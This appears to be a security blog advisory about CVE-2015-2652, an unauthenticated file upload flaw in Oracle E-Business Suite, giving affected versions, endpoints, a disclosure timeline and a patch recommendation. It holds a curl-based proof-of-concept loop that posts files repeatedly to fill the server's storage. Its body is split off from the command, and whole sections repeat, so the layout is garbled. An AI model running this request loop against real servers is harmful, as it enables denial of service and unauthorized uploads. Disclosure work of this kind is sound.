CVE-2015-2652 – Unauthenticated File Upload in Oracle E-business Suite.

CSS file critical vulnerability
WordPress Plugin – Revslider update captions CSS file critical vulnerability
March 27, 2015
Malware Detection : Adding glastopf juice to maldet engine
September 1, 2015

July 15, 2015

CVE-2015-2652 – Unauthenticated File Upload in Oracle E-business Suite.

During my regular penetration testing job, I unravelled an interesting vulnerability of Unauthenticated File Upload in Oracle E-business Suite 0-day vulnerability. This particular Upload Bug can be easily used to upload files on the web-server and also an attacker can flood the hard-disk of the server,thus making it easier for an attacker to leverage the vulnerability remotely.

Oracle released Critical Patch Update containing security fixes for the Oracle E-Business Suite. This vulnerability is remotely exploitable without requiring any kind of authentication , i.e. exploited over the network without the need for any valid username credentials.

Introduction

Oracle EBusiness Suite is a fully integrated, comprehensive suite of business applications for the enterprise. Following purposes most of organization uses Oracle E-business.

  1. Customer Relationship Management
  2. Financial Management
  3. Human Capital Management
  4. Project Portfolio Management
  5. Advanced Procurement
  6. Supply Chain Management
  7. Service Management

Vulnerable Version

Oracle E-Business Suite, version(s) 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4

Brief About bug

The unauthenticated upload vulnerability resides in Oracle Marketing component.  If you search in Google for Oracle E-business, you will find more than 30K unique search results.

The file is uploaded into a table in the E-Business Suite database schema.  The attacker,however, can use it to fill up the existing table space. Upload functionality allows the attacker to upload any arbitrary file types(All executables) and also allows to execute the uploaded code.

POC Raw code for feeding files files to server to :

for ($x=1; $x < 100; $x++):
curl -i -s -k  -X 'POST' \
    -H 'Origin: http://Oracle-Application:Port' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36' -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywS9xiTn7rP23Fori' -H 'Referer: http://Oracle-Application:Port/OA_HTML/amsImageSelect.jsp' \
    -b 'JSESSIONID=6e66b3f234234234272c18909d2bca0c96bf7c.kdsnfksjdfn34rk32; PROD_pses=PROD%3DHcqumhXKzuUX0xNEIjoeFKu8hZ%7E; PROD=HcqumhXKzuUX0xNEIjoeFKu8hZ; oracle.uix=0^^GMT+4:00^p' \
    --data-binary

Vulnerability Information

By using the following URLs the attacker can use it to upload files on the server.

http://ORACLE-WebServer:Port/OA_HTML/amsImageSelect.jsp
http://ORACLE-WebServer:Port/OA_HTML/amsImageUpload.jsp

Oracle E-business-vulnerabilityFor the security reasons we are not releasing uploaded file path.

Timeline


May 7, 2015 :  Identification of the vulnerability
May 8, 2015 :  Reported to the Oracle Security Team

May 12, 2015: Confirmed Upload Vulnerability in Oracle E-business
May 22, 2015 :Upload Vulnerability Patched
May 22, 2015 : CPU Scheduled for Critical Update
July 13, 2015 : CVE Allocated CVE-2015-2652
July 14, 2015 : Critical Update Pushed
July 15, 2015 : Vulnerability Made Public

Mitigation

Update Oracle E-business Suit to latest version.

Oracle vulnerability reference and vulnerability credit: Oracle Critical Patch Update Advisory – July 2015


------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition: form-data; name=\"type\"\x0d\x0a\x0d\x0aF\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition: form-data; name=\"FileInput\"; filename=\"Check.txt\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0a\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition: form-data; name=\"fileId\"\x0d\x0a\x0d\x0anull\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori\x0d\x0aContent-Disposition: form-data; name=\"url\"\x0d\x0a\x0d\x0a\x0d\x0a------WebKitFormBoundarywS9xiTn7rP23Fori--\x0d\x0a' \
    'http://Oracle-Application:Port//OA_HTML/amsImageUpload.jsp?dummy=1&jttst0=6_22646%2C22646%2C-1%2C0%2C&jtfm0=&etfm1=&jfn=ZG01DFBB7BC079CDE282F4716CF2E5B140454CA599F18AD7A2CAD711D30D5FB60DF18438A1D10EB7BD7CF1370CF9D979BDA7&oas=ddrqZePQ82zVbJrUIG7jrw..&JSSetFunctionName=null&elemName=null'
end for;

Vulnerability Information

By using the following URLs the attacker can use it to upload files on the server.

http://ORACLE-WebServer:Port/OA_HTML/amsImageSelect.jsp
http://ORACLE-WebServer:Port/OA_HTML/amsImageUpload.jsp

Oracle E-business-vulnerabilityFor the security reasons we are not releasing uploaded file path.

Timeline


May 7, 2015 :  Identification of the vulnerability
May 8, 2015 :  Reported to the Oracle Security Team

May 12, 2015: Confirmed Upload Vulnerability in Oracle E-business
May 22, 2015 :Upload Vulnerability Patched
May 22, 2015 : CPU Scheduled for Critical Update
July 13, 2015 : CVE Allocated CVE-2015-2652
July 14, 2015 : Critical Update Pushed
July 15, 2015 : Vulnerability Made Public

Mitigation

Update Oracle E-business Suit to latest version.

Oracle vulnerability reference and vulnerability credit: Oracle Critical Patch Update Advisory – July 2015

Table of contents

    Discover more from SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

    Subscribe now to keep reading and get access to the full archive.

    Continue reading